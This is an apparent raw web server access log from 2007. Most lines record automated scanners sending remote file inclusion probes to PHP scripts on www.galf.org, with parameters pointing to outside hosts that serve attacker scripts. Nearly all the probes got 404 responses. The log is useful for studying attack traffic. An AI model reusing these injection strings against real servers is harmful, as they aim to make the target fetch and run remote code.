81.169.157.122 - - [20/Aug/2007:02:29:47 -0700] "GET /logs/access_070730.log/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.211.196.5 - - [20/Aug/2007:02:29:48 -0700] "GET /modules/My_eGallery/index.php?basepath=http://br.geocities.com/prcanteiro/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:29:48 -0700] "GET /logs/access_070723.log/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:29:55 -0700] "GET /logs/access_070730.log/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:29:55 -0700] "GET /logs/access_070723.log/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:30:23 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [20/Aug/2007:02:30:24 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:30:50 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:30:51 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:31:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:31:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:31:53 -0700] "GET /logs/access_070730.log/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:31:53 -0700] "GET /logs/access_070723.log/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:32:12 -0700] "GET /logs/template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:32:13 -0700] "GET /logs/template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:32:13 -0700] "GET /template.php?pagina=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.157.122 - - [20/Aug/2007:02:32:13 -0700] "GET /template.php?pagina=ftp://194.78.119.139/SW-Stealingboard/pics/smile05.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
208.66.194.5 - - [20/Aug/2007:02:33:59 -0700] "GET /logs/access.log HTTP/1.1" 200 129362 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
211.43.222.218 - - [20/Aug/2007:02:37:28 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://donlotan.awardspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.43.222.218 - - [20/Aug/2007:02:37:29 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://donlotan.awardspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:41:02 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:41:03 -0700] "GET /modules/My_eGallery/index.php?basepath=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:02:41:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" 212.241.213.165 -